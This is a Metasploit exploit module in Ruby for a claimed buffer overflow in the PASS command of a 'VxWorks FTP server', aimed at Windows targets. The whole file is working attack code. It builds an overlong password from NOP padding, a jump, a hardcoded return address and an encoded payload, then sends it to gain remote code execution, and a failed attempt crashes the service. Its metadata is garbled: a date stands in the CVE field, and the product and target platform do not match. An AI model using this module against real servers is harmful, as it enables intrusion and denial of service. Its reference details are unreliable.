##
# $Id: VxWorks_FTP_server.rb 16850 2011-09-07 10:20:45Z Iraq $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'WVxWorks FTP server Password Overflow',
'Description' => %q{
This exploits the buffer overflow found in the PASS command
in VxWorks FTP server This particular module will only work
reliably against Windows targets. The server must be
configured to allow anonymous logins for this exploit to
succeed. A failed attempt will bring down the service
completely.
},
'Author' => 'Angel Injection',
'License' => BSD_LICENSE,
'Version' => '$Revision: 16850 $',
'References' =>
[
[ 'CVE', '7/9/2011'],
[ 'OSVDB', '16850' ],
[ 'BID', '16851' ],
[ 'URL', 'http://www.1337day.com/exploits/16851' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 530,
'BadChars' => "\x00\x0a\x0d\x40",
'StackAdjustment' => -3200,
'Compat' =>
{
'ConnectionType' => "-find"
}
},
'Targets' =>
[
# Target 0
[
'Windows',
{
'Platform' => 'win',
'Ret' => 0x5f4e772b
},
],
],
'DefaultTarget' => 0,
'DisclosureDate' => '7/9/2011'))
end
def exploit
connect
print_status("Trying target #{target.name}...")
buf = make_nops(655) + payload.encoded
buf[645, 2] = "\xeb\x06"
buf[562, 4] = [ target.ret ].pack('V')
# Send USER Command
send_user(datastore['FTPUSER'])
# Send PASS Command
send_cmd(['PASS', buf], false)
handler
disconnect
end
end
